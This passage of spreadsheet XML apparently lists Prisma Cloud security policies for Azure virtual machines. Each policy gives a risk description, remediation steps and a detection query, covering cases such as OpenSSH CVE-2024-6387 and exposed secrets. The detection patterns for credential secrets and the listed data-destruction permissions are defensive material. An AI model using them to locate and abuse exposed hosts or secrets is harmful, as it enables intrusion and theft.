      <c r="AA2583" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2583" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:04</t>
        </is>
      </c>
      <c r="AC2583" t="inlineStr"/>
      <c r="AD2583" t="b">
        <v>1</v>
      </c>
      <c r="AE2583" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2583" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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3" t="inlineStr">
        <is>
          <t>69b7f050-725e-4adb-a7bd-fe92c4e12fef</t>
        </is>
      </c>
      <c r="AI2583" t="inlineStr">
        <is>
          <t>d8a7a229-b698-409c-89b1-19aa3f86467d</t>
        </is>
      </c>
      <c r="AJ2583" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2583" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2584">
      <c r="A2584" t="inlineStr"/>
      <c r="B2584" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2584" s="2" t="inlineStr"/>
      <c r="D2584" t="n">
        <v>1</v>
      </c>
      <c r="E2584" t="n">
        <v>0</v>
      </c>
      <c r="F2584" t="n">
        <v>0</v>
      </c>
      <c r="G2584" t="b">
        <v>1</v>
      </c>
      <c r="H25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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2584" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2584" t="inlineStr">
        <is>
          <t>Unauthorized access risk due to a publicly exposed and vulnerable Azure Virtual Machine</t>
        </is>
      </c>
      <c r="L2584" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2584" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2584" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2584" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2584" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2584" t="inlineStr"/>
      <c r="R2584" t="inlineStr"/>
      <c r="S2584" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2584" t="b">
        <v>0</v>
      </c>
      <c r="U2584" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2584" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2584" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have critical or high vulnerabilities.
Attackers can exploit these vulnerabilities to compromise the confidentiality, integrity, and availability of the affected virtual machine, enabling them to perform malicious actions. The public exposure of these vulnerable virtual machines makes them an easy target for attacks.
Immediate attention is needed to remediate the critical and high vulnerabilities and public exposure reported for the virtual machines.</t>
        </is>
      </c>
      <c r="X258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84" t="inlineStr"/>
      <c r="Z2584" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2584" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2584" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2584" t="inlineStr"/>
      <c r="AD2584" t="b">
        <v>1</v>
      </c>
      <c r="AE2584" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2584" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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4" t="inlineStr">
        <is>
          <t>735b4ede-0fcf-4b57-af31-3a734af7b925</t>
        </is>
      </c>
      <c r="AI2584" t="inlineStr">
        <is>
          <t>48bb590b-091d-48ad-b5fd-7600a6619f3b</t>
        </is>
      </c>
      <c r="AJ2584" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2584" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2585">
      <c r="A2585" t="inlineStr"/>
      <c r="B2585" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2585" s="2" t="inlineStr"/>
      <c r="D2585" t="inlineStr"/>
      <c r="E2585" t="inlineStr"/>
      <c r="F2585" t="inlineStr"/>
      <c r="G2585" t="b">
        <v>1</v>
      </c>
      <c r="H25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585" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2585" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2585" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed Azure Virtual Machine instance with regreSSHion vulnerability (OpenSSH, CVE-2024-6387)</t>
        </is>
      </c>
      <c r="L2585" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2585" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2585" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2585" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2585" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2585" t="inlineStr"/>
      <c r="R2585" t="inlineStr"/>
      <c r="S2585" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2585" t="b">
        <v>0</v>
      </c>
      <c r="U2585" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2585" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2585" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2024-6387).
regreSSHion (CVE-2024-6387) is an unauthenticated remote code execution flaw in OpenSSH's server (sshd) versions prior to 4.4p1 and OpenSSH versions between 8.5p1 and 9.8p1 (excluding) that permits attackers to obtain full root access. It impacts the default setup without requiring any user involvement, posing a significant security threat that could result in system breaches, data exfiltration, and the escalation of privileges for additional attacks. The fact that the Azure Virtual Machine is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Successful exploitation of the OpenSSH Remote code execution vulnerability on the publicly exposed Azure Virtual Machine would allow an attacker to execute arbitrary code with the highest privileges, leading to a complete system takeover, malware installation, data manipulation and further move laterally to compromise other resources. This could lead to monetary loss, damage to reputation, and other compliance risks for the organization.
Immediate attention is required to remediate the OpenSSH (CVE-2024-6387) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2585" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict access to Azure Virtual machine by modifying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with Admin ports 22/3389
6. Set the 'Source' to the 'IP addresses' and enter trusted IP address or CIDR range in 'Source IP addresses/CIDR ranges'
7. Click 'Save' to apply the changes
[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2024-6387
2. Perform thorough backups of software configurations and data before applying updates
3. Refer to the below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2024-6387</t>
        </is>
      </c>
      <c r="Y2585" t="inlineStr"/>
      <c r="Z2585" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0) on Admin ports') AND with : (Vuln WHERE id IN ('CVE-2024-6387'))</t>
        </is>
      </c>
      <c r="AA2585" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2585" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:47</t>
        </is>
      </c>
      <c r="AC2585" t="inlineStr"/>
      <c r="AD2585" t="b">
        <v>1</v>
      </c>
      <c r="AE2585" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2585" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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85" t="inlineStr">
        <is>
          <t>a4251447-2ba4-4ec4-9fe1-0e4d3b599588</t>
        </is>
      </c>
      <c r="AI2585" t="inlineStr">
        <is>
          <t>666e2c93-1936-41f3-bc9e-47c8fd0520ce</t>
        </is>
      </c>
      <c r="AJ2585" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2585" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2586">
      <c r="A2586" t="inlineStr"/>
      <c r="B2586" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2586" s="2" t="inlineStr"/>
      <c r="D2586" t="inlineStr"/>
      <c r="E2586" t="inlineStr"/>
      <c r="F2586" t="inlineStr"/>
      <c r="G2586" t="b">
        <v>1</v>
      </c>
      <c r="H25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86" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2586" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2586" t="inlineStr">
        <is>
          <t>Secrets exposure risk due to publicly exposed and vulnerable Azure VM instance containing secrets</t>
        </is>
      </c>
      <c r="L2586" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2586" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2586" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2586" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2586" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2586" t="inlineStr"/>
      <c r="R2586" t="inlineStr"/>
      <c r="S2586" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2586" t="b">
        <v>0</v>
      </c>
      <c r="U2586" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2586" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2586" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed and vulnerable Azure VM instances containing secrets.
A publicly exposed and vulnerable Azure VM instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. An Azure VM instance containing secrets would allow attackers to escalate their permissions.
Immediate attention is required to remediate critical and high vulnerabilities, restrict public exposure, and remove secrets reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2586" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict access to Azure Virtual machine by modifying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[SECRETS_EXPOSURE]
Including sensitive secrets in a host filesystem poses significant security risks. It can lead to privilege escalation, unauthorised access, and application disruptions. Maintain a secure environment by removing secrets from hosts.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86" t="inlineStr"/>
      <c r="Z2586" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'azure-vm-list' ) and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE severity greater than or equal to high) AND has : (secret WHERE secret.type in ('Azure Storage Account Access Key', 'Azure Service Principal'))</t>
        </is>
      </c>
      <c r="AA2586" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2586" t="inlineStr">
        <is>
          <t>2024-09-02 06:33:52</t>
        </is>
      </c>
      <c r="AC2586" t="inlineStr"/>
      <c r="AD2586" t="b">
        <v>1</v>
      </c>
      <c r="AE2586" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2586" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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86" t="inlineStr">
        <is>
          <t>801d7cc3-9bfe-4563-97a7-f97073bd9ad9</t>
        </is>
      </c>
      <c r="AI2586" t="inlineStr">
        <is>
          <t>849835cd-4d44-4887-b5a8-047c5540727f</t>
        </is>
      </c>
      <c r="AJ2586" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2586" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2587">
      <c r="A2587" t="inlineStr">
        <is>
          <t>MLPS 2.0 (Level 2), CIS v2.1.0 (Azure) Level 1, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX)</t>
        </is>
      </c>
      <c r="B2587" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2587" s="2" t="inlineStr"/>
      <c r="D2587" t="inlineStr"/>
      <c r="E2587" t="inlineStr"/>
      <c r="F2587" t="inlineStr"/>
      <c r="G2587" t="b">
        <v>1</v>
      </c>
      <c r="H25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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2587" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2587" t="inlineStr">
        <is>
          <t>Azure Virtual Machine vTPM feature is disabled</t>
        </is>
      </c>
      <c r="L2587" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2587" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2587" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2587" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2587" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2587" t="inlineStr">
        <is>
          <t>SOX Section 302</t>
        </is>
      </c>
      <c r="R2587" t="inlineStr">
        <is>
          <t>Section 302.4</t>
        </is>
      </c>
      <c r="S2587" t="inlineStr"/>
      <c r="T2587" t="b">
        <v>0</v>
      </c>
      <c r="U2587" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2587" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2587" t="inlineStr">
        <is>
          <t>This policy identifies Virtual Machines that have Virtual Trusted Platform Module (vTPM) feature disabled. Virtual Trusted Platform Module (vTPM) provide enhanced security to the guest operating system. It is recommended to enable virtual TPM device on supported virtual machines to facilitate measured Boot and other OS security features that require a TPM.
NOTE: This assessment only applies to trusted launch enabled virtual machines. You can't enable trusted launch on existing virtual machines that were initially created without it. 
To know more, refer https://docs.microsoft.com/azure/virtual-machines/trusted-launch?WT.mc_id=Portal-Microsoft_Azure_Security</t>
        </is>
      </c>
      <c r="X2587" t="inlineStr">
        <is>
          <t>1. Log in to Azure portal
2. Navigate to Virtual machines dashboard
3. Click on the reported Virtual machine
4. Select 'Configuration' under 'Settings' from left panel 
NOTE: Enabling vTPM will trigger an immediate SYSTEM REBOOT.
5. On the 'Configuration' page, check 'vTPM' under 'Security type' section
6. Click 'Save'</t>
        </is>
      </c>
      <c r="Y2587" t="inlineStr"/>
      <c r="Z2587" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-vm-list' AND json.rule = powerState equal ignore case "PowerState/running" and ['properties.securityProfile'].['securityType'] equal ignore case "TrustedLaunch" and ['properties.securityProfile'].['uefiSettings'].['vTpmEnabled'] is false</t>
        </is>
      </c>
      <c r="AA2587" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2587" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2587" t="inlineStr">
        <is>
          <t>PC-AZR-CMP-917</t>
        </is>
      </c>
      <c r="AD2587" t="b">
        <v>1</v>
      </c>
      <c r="AE2587" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2587" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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7" t="inlineStr">
        <is>
          <t>dec308dd-8132-4cdf-a634-8a51972eca25</t>
        </is>
      </c>
      <c r="AI2587" t="inlineStr">
        <is>
          <t>d0b1d826-07a5-4a26-b8d6-855d049f109d</t>
        </is>
      </c>
      <c r="AJ2587" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2587" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2588">
      <c r="A2588" t="inlineStr"/>
      <c r="B2588" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2588" s="2" t="inlineStr"/>
      <c r="D2588" t="inlineStr"/>
      <c r="E2588" t="inlineStr"/>
      <c r="F2588" t="inlineStr"/>
      <c r="G2588" t="b">
        <v>1</v>
      </c>
      <c r="H25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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2588" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2588" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable Azure Virtual Machine with privilege escalation permissions</t>
        </is>
      </c>
      <c r="L2588" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2588" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2588" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2588" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2588" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2588" t="inlineStr"/>
      <c r="R2588" t="inlineStr"/>
      <c r="S2588" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2588" t="b">
        <v>0</v>
      </c>
      <c r="U2588" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2588" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2588" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed with critical or high vulnerabilities and have permissions that could potentially lead to privilege escalation.
Publicly exposed and vulnerable Azure Virtual Machine could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The risky permissions on the instance further help the attackers to perform unauthorized actions in the cloud account.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review risky privilege escalation permissions, remediate critical and high vulnerabilities, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2588"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588" t="inlineStr"/>
      <c r="Z2588" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Azure VM associated with entities that have risky permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2588" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2588" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2588" t="inlineStr"/>
      <c r="AD2588" t="b">
        <v>1</v>
      </c>
      <c r="AE2588" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2588" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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8" t="inlineStr">
        <is>
          <t>e19e5495-6185-4269-a57e-452808017db5</t>
        </is>
      </c>
      <c r="AI2588" t="inlineStr">
        <is>
          <t>82bdad2d-7a48-4b85-b172-29c1e77e722b</t>
        </is>
      </c>
      <c r="AJ2588" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2588" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2589">
      <c r="A2589" t="inlineStr"/>
      <c r="B2589" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2589" s="2" t="inlineStr"/>
      <c r="D2589" t="inlineStr"/>
      <c r="E2589" t="inlineStr"/>
      <c r="F2589" t="inlineStr"/>
      <c r="G2589" t="b">
        <v>1</v>
      </c>
      <c r="H25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89" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2589" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2589" t="inlineStr">
        <is>
          <t>Cloud breach risk due to publicly exposed admin ports on Azure Virtual Machine with data destruction permissions</t>
        </is>
      </c>
      <c r="L2589" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2589" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2589" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2589" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2589" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2589" t="inlineStr"/>
      <c r="R2589" t="inlineStr"/>
      <c r="S2589" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2589" t="b">
        <v>0</v>
      </c>
      <c r="U2589" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2589" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2589" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines which are publicly exposed with unrestricted access to admin ports (SSH / RDP) and have data destruction permissions
Data destruction permissions on publicly exposed Virtual Machines with unrestricted access to admin ports (SSH / RDP) may allow an attacker to gain access to the Virtual Machines and leverage that access to delete cloud storage buckets, snapshots, and images and destroy sensitive information stored in your cloud resources causing irreversible damage to your organization
This policy checks for the following data destruction permissions:
'Microsoft.Compute/disks/delete', 'Microsoft.Compute/virtualMachines/delete', 'Microsoft.Compute/images/delete', 'Microsoft.DBforMySQL/servers/delete', 'Microsoft.Sql/servers/delete', 'Microsoft.Storage/storageAccounts/delete'
Immediate attention is required to review data destruction permissions. Restrict public exposure of admin ports reported for the Virtual Machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2589"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589" t="inlineStr"/>
      <c r="Z2589" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0) on Admin ports','Azure VM instance with data destruction permissions')</t>
        </is>
      </c>
      <c r="AA2589" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2589" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:05</t>
        </is>
      </c>
      <c r="AC2589" t="inlineStr"/>
      <c r="AD2589" t="b">
        <v>1</v>
      </c>
      <c r="AE2589" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2589" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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89" t="inlineStr">
        <is>
          <t>52c291a9-9afc-4441-b487-e76de84a51cf</t>
        </is>
      </c>
      <c r="AI2589" t="inlineStr">
        <is>
          <t>47f5c273-6498-40ea-b21d-a508f6f65642</t>
        </is>
      </c>
      <c r="AJ2589" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2589" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2590">
      <c r="A2590" t="inlineStr"/>
      <c r="B2590" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2590" s="2" t="inlineStr"/>
      <c r="D2590" t="inlineStr"/>
      <c r="E2590" t="inlineStr"/>
      <c r="F2590" t="inlineStr"/>
      <c r="G2590" t="b">
        <v>1</v>
      </c>
      <c r="H25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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2590" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2590" t="inlineStr">
        <is>
          <t>Directory Traversal risk due to publicly exposed and vulnerable Azure Virtual Machine (ONNX, CVE-2024-27318, CVE-2022-25882)</t>
        </is>
      </c>
      <c r="L2590" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2590" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2590" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2590" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2590" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2590" t="inlineStr"/>
      <c r="R2590" t="inlineStr"/>
      <c r="S2590" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2590" t="b">
        <v>0</v>
      </c>
      <c r="U2590" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2590" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2590" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have a known Directory Traversal vulnerability (ONNX, CVE-2024-27318, CVE-2022-25882).
CVE-2024-27318 vulnerability occurs as a bypass for the patch added for CVE-2022-25882 that affects ONNX which enables unauthorized file access or manipulation through a Directory Traversal attack. With a CVSS base score of 7.5, it involves improper validation of file paths in the external_data field of the tensor proto, affecting versions up to and including 1.15.0. This vulnerability allows an attacker to access files outside the intended directories on the host operating system, potentially leading to information disclosure and system compromise.
The fact that the Azure Virtual Machine is publicly exposed makes it an easy target for attackers to exploit this vulnerability. Successful exploitation on the publicly exposed Azure Virtual Machine could allow an attacker to access sensitive files, undermining the confidentiality and integrity of the system.
Immediate attention is required to remediate the ONNX (CVE-2024-27318, CVE-2022-25882) vulnerability and the public exposure reported for the affected Azure Virtual Machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2590" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict Internet exposure of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
[Vulnerability]
To patch or update the vulnerable software refer to https://nvd.nist.gov/vuln/detail/CVE-2024-27318
https://nvd.nist.gov/vuln/detail/CVE-2022-25882</t>
        </is>
      </c>
      <c r="Y2590" t="inlineStr"/>
      <c r="Z2590" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-27318','CVE-2022-25882'))</t>
        </is>
      </c>
      <c r="AA2590" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2590" t="inlineStr">
        <is>
          <t>2024-05-23 08:56:26</t>
        </is>
      </c>
      <c r="AC2590" t="inlineStr"/>
      <c r="AD2590" t="b">
        <v>1</v>
      </c>
      <c r="AE2590" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2590" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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0" t="inlineStr">
        <is>
          <t>3fc04ec6-7781-42fd-9818-ec969bb81138</t>
        </is>
      </c>
      <c r="AI2590" t="inlineStr">
        <is>
          <t>394f6079-29dc-447b-bfae-8f28751b4b61</t>
        </is>
      </c>
      <c r="AJ2590" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2590" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2591">
      <c r="A2591" t="inlineStr"/>
      <c r="B2591" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2591" s="2" t="inlineStr"/>
      <c r="D2591" t="inlineStr"/>
      <c r="E2591" t="inlineStr"/>
      <c r="F2591" t="inlineStr"/>
      <c r="G2591" t="b">
        <v>1</v>
      </c>
      <c r="H25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591" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2591" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2591" t="inlineStr">
        <is>
          <t>Remote Code Execution (Unauthenticated) risk due to publicly exposed and vulnerable Azure Virtual Machine (Apache HugeGraph-Server, CVE-2024-27348)</t>
        </is>
      </c>
      <c r="L2591" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2591" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2591" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2591" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2591" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2591" t="inlineStr"/>
      <c r="R2591" t="inlineStr"/>
      <c r="S2591" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2591" t="b">
        <v>0</v>
      </c>
      <c r="U2591" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2591" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2591" t="inlineStr">
        <is>
